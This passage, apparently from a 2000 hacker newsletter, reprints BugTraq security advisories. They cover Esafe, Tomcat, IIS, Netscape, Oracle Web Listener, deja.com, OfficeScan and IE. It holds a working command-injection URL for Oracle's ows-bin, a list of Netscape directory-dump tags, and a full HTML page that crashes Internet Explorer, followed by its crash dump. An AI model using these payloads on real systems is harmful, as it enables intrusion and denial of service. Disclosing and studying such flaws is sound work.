own list, gpm-root starts this process with the group and
supplementary groups of the gpm-root daemon.



gpm-root calls setuid() first and setgid() afterwards, hence the later
one is unsuccessful. The authors completely forgot about calling
initgroups().

Egmont Koblinger



@HWA

93.0 HNS:Esafe Protect Gateway (CVP) problems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 22, 2000
The Esafe Protect Gateway (ESPG) does not scan some files in
combination with FireWall-1 and CVP ...

Esafe Protect Gateway (CVP) problems
Posted to BugTraq on March 22, 2000

After notification of the manufacturer here is the full report on
aproblem noted with Esafe Protect Gateway.

SUMMARY
-------

The Esafe Protect Gateway (ESPG) does not scan some files in
combination with FireWall-1 and CVP.

DETAILS
-------

If you want the Esafe Protect Gateway to scan all content for the
presence of a virus you have two options.

1. Choose to scan anything not listed in the 'safe file types' list. And
then clear out all entries in that list.

2. Choose to scan only files listed in the 'dangerous file types' list.
And then have only one extension listed namely '*'.

Deciding to rely on extensions seems an indication of a flawed
designallready. Renaming files is a common practice and can be
done by anyone capable of operating a keyboard.

The problem is that anything with the MIME type set to TEXT/HTML
will not be scanned regardless of the options recommended above.

A simple test was capable of pointing this out.

Setup a default Apache server. Copy a virusfile to two location
beinghttp://website/test1.txt and http://website/test1.html and try to
download them with your favorite browser. The URL is unique and
was never used by your browser to minimize the possibilities of
caches being in place. But forced reloads work properly and are
sufficiant if you want to replicate this issue.

Downloading http://website/test1.html dows nothing to detect the
virus and it is yours. No protection is offered.
Downloadinghttp://website/test1.txt will not work as ESPG will now
intercept the file contain the virus.

By adjusting the webserver to send out *.txt as MIME type
TEXT/HTML and *.html as MIME type TEXT/PLAIN you can now test
with http://website/test2.txt and http://website/test2.html to verify
things. Downloading http://website/test2.txt will get you infected as
ESPG will not scan the file. And downloading
http://website/test2.html will not work as ESPG detects the virus
and will prevent it from downloading.

CONCLUSION
----------

Esafe Protect Gateway can at present not be trusted to protect you
from downloading a virus.

VERSIONS
--------

Esafe Protect Gateway v2.1 build 98.
Virus tables dated March 15, 2000.
STATUS
------

Manufacturer notified.
No fix available.
Results have not been confirmed yet.

However I was able to verify that the problem lies with Esafe and not
with Check Point by using Trend Micro's CVP server instead which
did not suffer from the same problem.

Hugo.





@HWA

94.0 HNS:Bug in Apache project: Jakarta Tomcat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 22, 2000
The Apache project: Jakarta Tomcat contains a serius security bug.
Tomcat is used together with the Apache web server to serve Java
Server Pages and Java servlets. ...


Bug in Apache project: Jakarta Tomcat
Posted to BugTraq on March 22, 2000

The Apache project: Jakarta Tomcat contains a serius security
bug.Tomcat is used together with the Apache web server to serve
Java Server Pages and Java servlets.
Summary from the Tomcat development team advisory is posted
below:Advisory:

Delivered with Tomcat is an example (jsp/source.jsp) that can be
used to deliver the contents of any file on your machine.

Recommended action:

The simplest course of action is to simply remove this example from
your machine. Alternatively, you can replace the associated
ShowSource.class file with one from the current 3.1 beta.

Fixes:

Fixes have been made to the core of Tomcat to not allow any file
references to be resolved outside of the context being used for the
resolution.Additionally, a change has been made to
ShowSource.java to disallow any requests which contain the string
"..".

The 3.1 beta 1 release has been refreshed with these fixes applied.

Med venlig hilsen/Best regards/Freundliche Grüße

Jan Madsen

S e c u r i t y w o r k e r s

@HWA



95.0 HNS:MS SECURITY BULLETIN #18
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 21, 2000
Microsoft has released a patch that eliminates a securityvulnerability
in Microsoft Internet Information Server 4.0. The vulnerability could
allow a malicious user to consume all resources on a web server
and prevent it from servicing other users.< ...

MS SECURITY BULLETIN #18
Posted to BugTraq on March 21, 2000

Microsoft Security Bulletin (MS00-018)
- --------------------------------------

Patch Available for "Chunked Encoding Post" Vulnerability

Originally Posted: March 20, 2000

Summary
=======

Microsoft has released a patch that eliminates a securityvulnerability
in Microsoft(r) Internet Information Server 4.0. Thevulnerability could
allow a malicious user to consume all resources ona web server and
prevent it from servicing other users.

Frequently asked questions regarding this vulnerability can be
foundat
http://www.microsoft.com/technet/security/bulletin/fq00-018.asp.

Issue
=====
IIS 4.0 supports chunked encoding transfers, but does not limit
thesize of the buffer that can be reserved. This would allow a
malicioususer to request an extremely large buffer for a POST or
PUT operation,but never actually send data, thereby blocking
memory on the serverthat had been allocated to the session. If
sufficient memory on theserver were blocked in this fashion, it could
prevent the server fromperforming useful work. There is no capability
through this attack tocreate, modify or delete data on the server, nor
is there anycapability to usurp administrative control of the server. If
themalicious user closed his session, the memory would be released
andthe server's operation would return to normal. Otherwise, the
machinecould be put back into normal service by stopping and
restarting theservice.

Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0

Patch Availability
================== - X86:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19761
- Alpha:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19762

NOTE: Additional security patches are available at the
MicrosoftDownload Center


@HWA



96.0 HNS:S.A.F.E.R. Security Bulletin 000317
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 20, 2000
Problem exists in Netscape Enterprise Server that can allow remote
user to obtain list of directories and subdirectories on the server ...

S.A.F.E.R. Security Bulletin 000317
Posted to BugTraq on March 20, 2000

S.A.F.E.R. Security Bulletin 000317.EXP.1.5

______________________________________________

TITLE :
Netscape Enterprise Server and '?wp' tags
DATE :
March 17, 2000
NATURE :
Remote user can obtain list of directories on Netscape Enterprise
Server
AFFECTED :
Netscape Enterprise Server 3.x

PROBLEM:

Problem exists in Netscape Enterprise Server that can allow remote
user to obtain list of directories and subdirectories on the server.

DETAILS:

Netscape Enterprise Server with 'Web Publishing' enabled can be
tricked into displaying the list of directories and subdirectories, if
usersupplies certain 'tags'. For example:

http://home.netscape.com/?wp-cs-dump

will reveal the contents of the root directory on that web
server.Contents of subdirectories can be obtained as well. Other
tags that can be used are:

?wp-ver-info
?wp-html-rend
?wp-usr-prop
?wp-ver-diff
?wp-verify-link
?wp-start-ver
?wp-stop-ver
?wp-uncheckout

FIXES:

Disable 'Web Publishing'. It is safe to assume that 'Web Publishing'
is not the only feature that will 'activate' this problem. We have
foundfew servers running Netscape Enterprise Server that did not
have 'WebPublishing' enabled, but were still vulnerable to this
problem. UntilNetscape makes an official response and clarify what
is the cause ofthis problem, it is advised that you test your server
against thisvulnerability, and if you are vulnerable, try to disable
certainfeatures and services.

Netscape has been contacted on many occasions, but has failed
torespond.

S.A.F.E.R. - Security Alert For Entreprise Resources
Copyright (c) 2000 The Relay Group


@HWA


97.0 HNS:Decon fix for con/con is vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 18, 2000
If you had con problem and installed Decon fix, you are now
vulnerable to another win 95(possibly)/98(test

  
ed) crash which is
worse than the previous. ...

Decon fix for con/con is vulnerable
Posted to BugTraq on March 18, 2000

If you had con problem and installed Decon fix, you are now
vulnerableto another win 95(possibly)/98(tested) crash which is
worse than the previous.

Software affected : All versions of Microsoft Internet Explorer
(Itdoesn't work in Netscape Navigator)

Actual problem :Type existing server in address box, and then
request for nonexistent file with name >300 symbols. After server
sends reply to the browseryour system stops responding at all,
Control+Alt+Del work but youwon't see the box with tasks running
so only thing you can do isREBOOT.
Somebody can deface some good website and create a redirectwith
0 seconds waiting to such link.
Example :

http://www.amsouth.com/(lot of aaaa's).html

Fix : Delete Decon fix from startup folder :) Now you are vulnerableto
con/con.

Hello to Cre@tor

Speedo
mailto:Tima@au.ru


@HWA



98.0 HNS:Cerberus Information Security Advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000
The Cerberus Security Team has discovered a number of issues
with Oracle's Web Listener, part of the Oracle Application Server,
that can allow a remote attacker to run arbitrary commands on the
web server ...

Cerberus Information Security Advisory
Posted to BugTraq on March 17, 2000

Released : 15th March 2000
Name : Oracle
Affected Systems : Oracle Web Listener 4.0.x on Windows NT
Issue : Attackers can run arbitrary commands on the webserver

Description
***********
The Cerberus Security Team has discovered a number of issues
with Oracle's Web Listener, part of the Oracle Application Server,
that can allow aremote attacker to run arbitrary commands on the
web server

Details
*******
Part of the problem is caused by default settings after OAS has
beeninstalled. The "ows-bin" virtual directory on an Oracle Web
Listener is the equivalent of the "cgi-bin" on other web servers and
by default this is set toC:\orant\ows\4.0\bin - this directory not only
contains a number of batch files, DLLs andexecutables but also the
binary image file for the Listener itself. Even if this default setting
has been changed however you may still be at risk if you have batch
files in the new "ows-bin" directory.

Arbitrary Command Execution
***************************
The Oracle Web Listener will execute batch files as CGI scripts and
bymaking a request to a batch file that requires one or more
arguments it is possible to execute any command the attacker
wants by building a special query string.

For example the following will give a directory listing:

http://charon/ows-bin/perlidlc.bat?&dir

It is even possible to use UNC paths so the Listener will connect to
the remote machine over NBSession, download the executable and
then execute it.

By default the Web Listener process runs in security context of
SYSTEM so anycommands issued by an attacker will run with
SYSTEM privileges.

Another problem is that the Listener will expand the "*" character so
even if the attacker doesn't know the name of a real batch file in the
"ows-bin"they can request *.bat?&command

Executables
***********
Some of the executables in the default directory allow attackers to
kill services, return configuration information and cause other
undesirable events tooccur.

Solution:
*********
Due to the severity of this problem Cerberus recommends that the
following be actioned immediately.

If "ows-bin" is the default then using the Oracle Application Server
Manager remove the ows-bin virtual directory or point it to a more
benign directory. If "ows-bin" is not the default then verfiy that there
are no batch files in thisdirectory. A check for this has been added
to Cerberus' security scanner, CIS available from their website.

About Cerberus Information Security, Ltd
********************************
Cerberus Information Security, Ltd, a UK company, are specialists
inpenetration testing and other security auditing services. They are
thedevelopers of CIS (Cerberus' Internet security scanner) available
for free from their website: http://www.cerberus-infosec.co.uk

To ensure that the Cerberus Security Team remains one of the
strongestsecurity audit teams available globally they continually
research operating system and popular service software
vulnerabilites leading to the discovery of "world first" issues. This not
only keeps the team sharp but also helps the industry and vendors
as a whole ultimately protecting the end consumer. As testimony to
their ability and expertise one just has to look at exactly how many
major vulnerabilities have been discovered by the Cerberus Security
Team - over 40 to date, making them a clear leader of companies
offering such security services.

Founded in late 1999, by Mark and David Litchfield, Cerberus
Information Security, Ltd are located in London, UK but serves
customers across the World. For more information about Cerberus
Information Security, Ltd please visit their website or call on +44(0)
181 661 7405

Permission is hereby granted to copy or redistribute this advisory
but onlyin its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd



@HWA

99.0 HNS:Malicious-HTML vulnerabilities at deja.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000
Deja.com does not always escape meta-characters when displaying
Usenet articles. This allows an attacker to include arbitrary tags in
the HTML sentto people reading the attackers article at deja.com.<
...

Malicious-HTML vulnerabilities at deja.com
Posted to BugTraq on March 17, 2000

Niall Smart, niall@pobox.com

Synopsis
========
deja.com does not always escape meta-characters when
displayingUsenet articles. Specifically, the article view
page(http://www.deja.com/getdoc.xp) and the thread view
page(http://www.deja.com/viewthread.xp) display the subject of
thearticle "as is" between title tags.

This allows an attacker to include arbitrary tags in the HTML sentto
people reading the attackers article at deja.com.

There are probably a large number of sites out there with this typeof
vulnerability, the deja.com example is interesting because it'sa busy
site with a large amount of relatively users who naivelytrust it.

Exploit
=======
An attacker can embed any tag in the head or body of the HTML
page.This allows numerous attacks including:

Cross Site Scripting:

An attacker can post an article with a link to a script on
anotherserver and call that script from the onLoad event handler.

Site Spoofing:

An attacker can use a meta tag to automatically redirect theuser to
a spoofed version of deja.com.

See the CERT advisory referenced below for more information on
thistype of attack.

Examples
========
NOTE: The following examples are intended to be harmless,
however I take no responsibility for any damage caused by following
these links.

JavaScript popup:

http://www.deja.com/getdoc.xp?AN=591804116

Redirection using meta tag:

http://www.deja.com/getdoc.xp?AN=591833344

Notes
=====

I haven't thoroughly tested deja.com's pages, there may be
otherinstances of this error. It would be particularly interesting tofind
one that didn't require the attacker to include the HTML inthe subject
field of the article.

This example illustrates how *not* to approach
meta-characterescaping. If you call a function to escape
meta-characters eachtime the data is inserted into the web page, as
deja.com appear todo, you run the risk of occasionally forgetting to
do it. deja.comescape correctly in two other places on the article
view page butforget once. Instead you should escape them earlier in
the dataflow, perhaps just after getting the data from the database,
therebyprecluding the human-error factor.

References
==========

CA-2000-02 Malicious HTML Tags Embedded in Client Web
Requests
http://www.cert.org/advisories/CA-2000-02.html

HTML 3.2 Character Entities
http://www.w3.org/TR/REC-html32.html#latin1


@HWA



100.0 HNS:Certificate Validation Error in Netscape Browsers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000
The problem is that there is an inherited trust between an
expiredcertificate and an active certificate, where there really
shouldn't be. If any trust should be there, it certainly shouldn't be
with an expired certificate. ...

Certificate Validation Error in Netscape Browsers
Posted to BugTraq on March 17, 2000

This may not be a normal "BugTraq" issue, since it is more a flaw in
trust in a security design then it is an actual bug in
software...butnone-the-less I think it is something that should be
discussed. I haven't checked this with Microsoft IE, I just noticed it
as being a flaw inNetscape (submitted a bug report to them earlier
but they are eitherreally busy or have chosen to ignore the report.)
Tested in browsers from 4.07 - 4.72, all which operated in the same
fashion.

What is the issue?

The scenario is that a user accesses a website for which they do
notcurrently have trust for the signer of the certificate. They are
asked whether they would like to trust the server certificate (until
itexpires,) which if they respond yes, the web site signer certificate
will be stored in the certificate database. You can check on
thesecertificates by clicking on the Security Icon on the browser,
then select the Website item from the menu. Once stored in the
database, any future access to this site is permitted without
warning. The error occurs when the web site certificate is expired
and the new site certificate is valid, Netscape never checks to see if
the certificate is expired and replaced with a new certificate, and
thus the user can continue to access the site without a warning
stating that the certificate is expired and that a new certificate exists
for the site (it apparently only checks to see if the new certificate
isn't expired.) Manually verifying the old certificate in the database
will prove that the certificate is invalid. When the site is properly
reissued a certificate, Netscape automatically trusts the
newcertificate based on the previous certificate...if the
previouscertificate is removed from the database and the website is
re-accessed, the standard warning appears asking the user if they
wish to trust thecertificate. Since the new certificate is
cryptographically differentfrom the old certificate, no trust
relationship should exist (only thesigner is the same.)

Netscape does not replace the old expired certificate with the
newcertificate, and does not add the new certificate to the database.
Nor does it tell the user that the new certificate a site is sending
does not match a previous certificate.

Why is this a problem?

The problem is that there is an inherited trust between an
expiredcertificate and an active certificate, where there really
shouldn't be. If any trust should be there, it certainly shouldn't be
with an expired certificate. The idea here is that Netscape should
complain about a site which has a certificate different than what
Netscape has in its database. When you accept a certificate from a
website which you do not already hold a trust with the signer of the
certificate, you should be warned if that certificate is no longer valid
or when the server has been issued a new one. You are trusting that
certificate and its signer, not that site. If the site's certificate
changes, you should be warned about the change and asked if you
still want to trust the site. If a hacker manages to gain access to the
key and the certificate, and changes the key and thecertificate, a
warning may be the only thing to protect you from thathacker
becoming a man in the middle to the attack.

What should be the solution?

An option, in the browser, to allow the user to be warned the first
time a certificate changes on a webserver. If the previous certificate
isexpired, and the current certificate on a site is different, the
usershould be warned of the change, and asked whether they wish
the newcertificate to replace the previous one. That way, paranoid
users like myself can be warned when a certificate changes, so that
we can decidewhether the new certificate should be trusted. Of
course, if I already trust the certificate signer, then I shouldn't be
prompted about thecertificate.


@HWA

101.0 HNS:"OfficeScan DoS & Message Replay" Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000
Trend Micro has released a new version of OfficeScan Corporate
Edition - version 3.51 - that eliminates two security vulnerabilities
found on previous versions ...

OfficeScan DoS & Message Replay" Vulnerability
Posted to BugTraq on March 17, 2000

Summary
=======
Trend Micro has released a new version of OfficeScan Corporate
Edition - version 3.51 - that eliminates two security vulnerabilities
found onprevious versions. Previous versions of OfficeScan allow
intruders within a firewall to initiate a DoS attack on the OfficeScan
client (tmlisten.exe) as well as to capture OfficeScan commands.
These commands can be replayed and used to change other
OfficeScan client configurations.

Issues
======
Trend OfficeScan version 3.5 or earlier versions perform incomplete
parsing and buffer overflow checking in its Windows NT client. If a
malicious user, has the ability to telnet and submit some form of
message to the OfficeScan NT client, OfficeScan service consumes
100% CPU processing power. Inaddition, communication between
the OfficeScan server and client wasestablished with insufficient
encryption and authentication, which allows a malicious user to sniff
and replay OfficeScan commands.

Implementation
==============
Trend Micro has corrected the DoS attack issue by correctly parsing
and handling commands or arbitrary messages sent to the
OfficeScan client.

Trend Micro has implemented MD5 Message-Digest Algorithm to
ensure that the commands between the server and the clients can
not be decrypted or captured to be replayed to other clients. For
details about the MD5 encryptionalgorithm see:
http://theory.lcs.mit.edu/~rivest/rfc1321.txt

Affected Software Versions
==========================
Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.5
Trend OfficeScan for Microsoft SBS 4.5

Patch Availability
==================
- http://www.antivirus.com/download/ofce_patch.htm

More Information
============
Please see the following references for more information related to
this issue.
- Trend Micro Security Bulletin:
http://www.antivirus.com/download/ofce_patch_35.htm

- Frequently Asked Questions: Trend Micro Knowledge Base
http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8

Obtaining Support on this Issue
===============================
This is a fully supported release. Information on contacting Trend
Micro Technical Support is available at
http://www.trend.com/support/default.htm


@HWA

102.0 HNS:MS Security bulletin#17
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and
Windows 98 Second Edition. The vulnerability could cause a user's
system to crash, if they attempted to access a file or folder whose
path contained certain reserved words. ...


MS Security bulletin#17
Posted to BugTraq on March 17, 2000

Microsoft Security Bulletin (MS00-017)
--------------------------------------

Patch Available for "
DOS Device in Path Name" Vulnerability

Originally Posted: March 16, 2000

Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and
Windows 98 Second Edition. The vulnerability could cause a user's
system to crash, if they attempted to access a file or folder whose
path contained certain reserved words.

Frequently asked questions regarding this vulnerability can be
foundat
http://www.microsoft.com/technet/security/bulletin/fq00-017.asp.

Issue
=====
DOS device names are reserved words, and cannot be used as
folder or file names. When parsing a reference to a file or folder,
Windows correctly checks for the case in which a single DOS
device name is used in the path, and treats it as invalid. However, it
does not check for the case in which the path includes multiple
DOS device names. When Windows attempts to interpret the device
name as a file resource, it performs an illegal resource access that
usually results in a crash.

Because it is not possible to create files or folders that contain
DOSdevice names, it would be unusual for a user to try to access
one under normal circumstances. The chief threat posed by this
vulnerability is that a malicious user could attempt to entice a user
to attempt such an access. For instance, if a web site operator
hosted a hyperlink that referenced such a path, clicking the link
would result in the user's machine crashing.Likewise, a web page or
HTML mail that specified a local file as the source of rendering
information could cause the user's machine to crash when it was
displayed. If this happened, the machine could be put back into
normalservice by restarting it.

Affected Software Versions
==========================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition

Patch Availability
==================
- Windows 95:
http://www.microsoft.com/downloads/release.asp?releaseID=19491
- Windows 98 and Windows 98 Second Edition:
http://www.microsoft.com/downloads/release.asp?ReleaseID=19389
NOTE: Additional security patches are available at the Microsoft
Download Center

NOTE:
The patch will be available shortly at the WindowsUpdate site. When
this happens, we will modify the bulletin to provide additional
information.

More Information
================
Please see the following references for more information related to
this issue.
- Microsoft Security Bulletin MS00-017: Frequently Asked
Questions,
http://www.microsoft.com/technet/security/bulletin/fq00-017.asp
- Microsoft Knowledge Base article Q256015 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp.

Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting
MicrosoftTechnical Support is available at
http://support.microsoft.com/support/contact/default.asp

Revisions
=========
- March 16, 2000: Bulletin Created.

@HWA

103.0 HNS:Georgi Guninski security advisory #9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/


Posted @ March 15, 2000
There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT
(probablyothers) which allows executing arbitrary programs using
.eml files.This may be exploited when browsing web pages or
openining an email message in Outlook. ...

Georgi Guninski security advisory #9
Posted to BugTraq on March 15, 2000

IE and Outlook 5.x allow executing arbitrary programs using .eml
files

Disclaimer:
The opinions expressed in this advisory and program are my own
and notof any company.The usual standard disclaimer applies,
especially the fact that GeorgiGuninski is not liable for any damages
caused by direct or indirect useof the information or functionality
provided by this program.Georgi Guninski, bears NO responsibility
for content or misuse of thisprogram or any derivatives thereof.

Description:
There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT
(probablyothers) which allows executing arbitrary programs using
.eml files.This may be exploited when browsing web pages or
openining an emailmessage in Outlook.This may lead to taking
control over user's computer.It is also possible to read and send
local files.

Details:
The problem is creating files in the TEMP directory with known
name andarbitrary content.One may place a .chm file in the TEMP
directory which contains the"
shortcut" command and when the .chm
file is opened with the showHelp()method programs may be
executed.
This vulnerability may be exploited by HTML email message in
Outlook.

Demonstration which starts Wordpad:
http://www.nat.bg/~joro/eml.html

(Note: George seems to have pulled the script, it gives a 404
now .. - Ed/Cruci)

Workaround: Disable Active Scripting.

Copyright 2000 Georgi Guninski


103.1 PSS:More MSIE crashing info by NtWakO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: Packet Storm Security
http://packetstorm,securify.com/

--[Tuesday, March 21, 2000 by NtWaK0 /
biteraser]------------------------------

--[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY*
Object]---

--[Tested on Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too
?]-------

Here is the story, while having a chat (IRC) with biteraser today heh, he
suddenly said *fu*k* hrm... I said what is wrong

He said I JUST CRASHED IE..
After some investigation it turned about to be the *HISTORY* Object :).

So if you cut and past the html code in a file, then open it with IE, you
will
be able to see the crash.

Note: key line is: <HS:HISTORY ID="
HS">, without it IEt won't crash and
behavior
should be #default. It can be exploited more.


--[SNIP]--------------------------------------------------------------------
---
<HTML>
<HEAD>
<Title>Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx</Title>
</HEAD>
<BODY>
<xml:namespace ns='CallFixPage' prefix='HS'>
<STYLE>
@media all{HS\:HISTORY {behavior:url(#default);}}
</STYLE>
<!--XML code -->
<HS:HISTORY ID="
HS" />
<!-- End XML code -->

</BODY>
</HTML>
--[SNIP]--------------------------------------------------------------------
---



NOTE: Crash Memory dump.



Application exception occurred:
App: exe\iexplore.dbg (pid=219)
When: 3/21/2000 @ 12:52:24.60
Exception number: c0000005 (access violation)

*----> System Information <----*
Computer Name: INFOSEC-BRAIN
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 6 Stepping 10
Windows Version: 4.0
Current Build: 1381
Service Pack: 6
Current Type: Uniprocessor Free
Registered Organization: NtWaK0
Registered Owner: NtWaK0

(00400000 - 00412000) exe\iexplore.dbg
(77f60000 - 77fbe000) dll\ntdll.dbg
(77f00000 - 77f5e000) dll\kernel32.dbg
(77e70000 - 77ec5000) dll\user32.dbg
(77ed0000 - 77efc000) dll\gdi32.dbg
(77dc0000 - 77dff000) dll\advapi32.dbg
(77e10000 - 77e67000) dll\rpcrt4.dbg
(70bd0000 - 70c19000) SHLWAPI.dbg
(71500000 - 71610000) SHDOCVW.dbg
(00760000 - 007e9000) COMCTL32.dbg
(77c40000 - 77d7b000) dll\shell32.dbg
(71740000 - 71740000)
(22000000 - 22000000)
(77b20000 - 77bd7000) dll\ole32.dbg
(71050000 - 71118000) BROWSEUI.dbg
(717b0000 - 717b0000)
(779b0000 - 779b9000) dll\linkinfo.dbg
(77720000 - 77731000) dll\mpr.dbg
(77a40000 - 77a4d000) dll\ntshrui.dbg
(78000000 - 78040000)
(77800000 - 7783a000) dll\netapi32.dbg
(77840000 - 77849000) dll\NetRap.dbg
(777e0000 - 777ed000) dll\samlib.dbg
(65340000 - 653d2000) oleaut32.dbg
(70290000 - 702fe000) URLMON.dbg
(77a90000 - 77a9b000) dll\version.dbg
(779c0000 - 779c8000) dll\lz32.dbg
(77bf0000 - 77bf7000) dll\rpcltc1.dbg
(70410000 - 70492000) MLANG.dbg
(70000000 - 70242000) MSHTML.dbg
(01700000 - 01772000) WININET.dbg
(48080000 - 48080000)
(76ab0000 - 76ab5000) dll\imm32.dbg
(70f00000 - 70f1a000) dll\iepeers.dbg

State Dump for Thread Id 0xd2

eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000
edi=80004005
eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000202


function: Ordinal158
70bd180d 8b542408 mov edx,[esp+0x8]
ss:0129808f=????????
70bd1811 56 push esi
70bd1812 8b742408 mov esi,[esp+0x8]
ss:0129808f=????????
FAULT ->70bd1816 0fb706 movzx eax,word ptr [esi]
ds:00000000=????
70bd1819 46 inc esi
70bd181a 46 inc esi
70bd181b 83f841 cmp eax,0x41
70bd181e 7c05 jl Ordinal158+0x18 (70bd1825)
70bd1820 83f85a cmp eax,0x5a
70bd1823 7e1d jle Ordinal158+0x35 (70bd1842)
70bd1825 0fb70a movzx ecx,word ptr [edx]
ds:70f01ef4=0043
70bd1828 42 inc edx
70bd1829 42 inc edx
70bd182a 83f941 cmp ecx,0x41
70bd182d 7c05 jl Ordinal158+0x27 (70bd1834)

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
000696a4 700c8078 017d1e10 00000000 0009e4cc 012c5938 SHLWAPI!Ordinal158
000696cc 700c8014 017d1e10 00000000 012c5a34 012c5938 MSHTML!ShowModalDialog
000696f4 700c7f8e 00000000 012c5a34 012c5938 00069740 MSHTML!ShowModalDialog
00069718 700c7f05 00000000 012c5938 00069740 012c5930 MSHTML!ShowModalDialog
00069744 700c7e5d 00000000 012c59ec 0000c07c 0009c07c MSHTML!ShowModalDialog
00069b60 700c7b2f 012c5930 00000000 012c5904 012c5930 MSHTML!ShowModalDialog
00069b94 700add5d 012c5930 012c5904 00001000 012c3410 MSHTML!ShowModalDialog
0006dc58 700774db 012c3410 0006dc78 0009c070 0009bb60
MSHTML!DllGetClassObject
0006dc8c 7004723f 00000003 0006dccc 012c2600 0006dcd8
MSHTML!MatchExactGetIDsOfNames
00000000 00000000 00000000 00000000 00000000 00000000
MSHTML!MatchExactGetIDsOfNames

*----> Raw Stack Dump <----*
00069688 0d 18 bd 70 57 6d f0 70 - 00 00 00 00 f4 1e f0 70
...pWm.p.......p
00069698 68 c0 09 00 00 00 00 00 - 40 97 06 00 cc 96 06 00
h.......@.......
000696a8 78 80 0c 70 10 1e 7d 01 - 00 00 00 00 cc e4 09 00
x..p..}.........
000696b8 38 59 2c 01 40 97 06 00 - 10 1e 7d 01 cc e4 09 00
8Y,.@.....}.....
000696c8 00 00 00 00 f4 96 06 00 - 14 80 0c 70 10 1e 7d 01
...........p..}.
000696d8 00 00 00 00 34 5a 2c 01 - 38 59 2c 01 40 97 06 00
....4Z,.8Y,.@...
000696e8 40 97 06 00 ec 59 2c 01 - 05 40 00 80 18 97 06 00
@....Y,..@......
000696f8 8e 7f 0c 70 00 00 00 00 - 34 5a 2c 01 38 59 2c 01
...p....4Z,.8Y,.
00069708 40 97 06 00 30 59 2c 01 - 30 59 2c 01 60 bb 09 00
@...0Y,.0Y,.`...
00069718 44 97 06 00 05 7f 0c 70 - 00 00 00 00 38 59 2c 01
D......p....8Y,.
00069728 40 97 06 00 30 59 2c 01 - ec 59 2c 01 00 00 00 00
@...0Y,..Y,.....
00069738 10 34 2c 01 00 20 0c 70 - 00 00 00 00 60 9b 06 00 .4,..
.p....`...
00069748 5d 7e 0c 70 00 00 00 00 - ec 59 2c 01 7c c0 00
0 ]~.p.....Y,.|...
00069758 7c c0 09 00 00 00 00 00 - 00 00 5c 00 43 00 72 00
|.........\.C.r.
00069768 61 00 73 00 68 00 5f 00 - 41 00 4c 00 4c 00 5f 00
a.s.h._.A.L.L._.
00069778 49 00 45 00 34 00 5f 00 - 49 00 45 00 35 00 5f 00
I.E.4._.I.E.5._.
00069788 6f 00 6e 00 5f 00 57 00 - 69 00 6e 00 64 00 6f 00
o.n._.W.i.n.d.o.
00069798 77 00 73 00 5f 00 39 00 - 78 00 5f 00 61 00 6e 00
w.s._.9.x._.a.n.
000697a8 64 00 5f 00 41 00 6c 00 - 6c 00 5f 00 4e 00 54 00
d._.A.l.l._.N.T.
000697b8 5f 00 53 00 50 00 78 00 - 5f 00 77 00 69 00 74 00
_.S.P.x._.w.i.t.

State Dump for Thread Id 0xc6

eax=7ffdd000 ebx=00000000 ecx=00000001 edx=00000000 esi=00074a30
edi=000872e8
eip=77f67fa7 esp=0084fdf0 ebp=0084ff90 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000206


function: ZwReplyWaitReceivePort
77f67f9c b890000000 mov eax,0x90
77f67fa1 8d542404 lea edx,[esp+0x4]
ss:01a7e7f7=????????
77f67fa5 cd2e int 2e
77f67fa7 c21000 ret 0x10
77f67faa 8bc0 mov eax,eax

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
0084ff90 77e15a1d 77e160f7 00074a30 0084ffec ffffffff
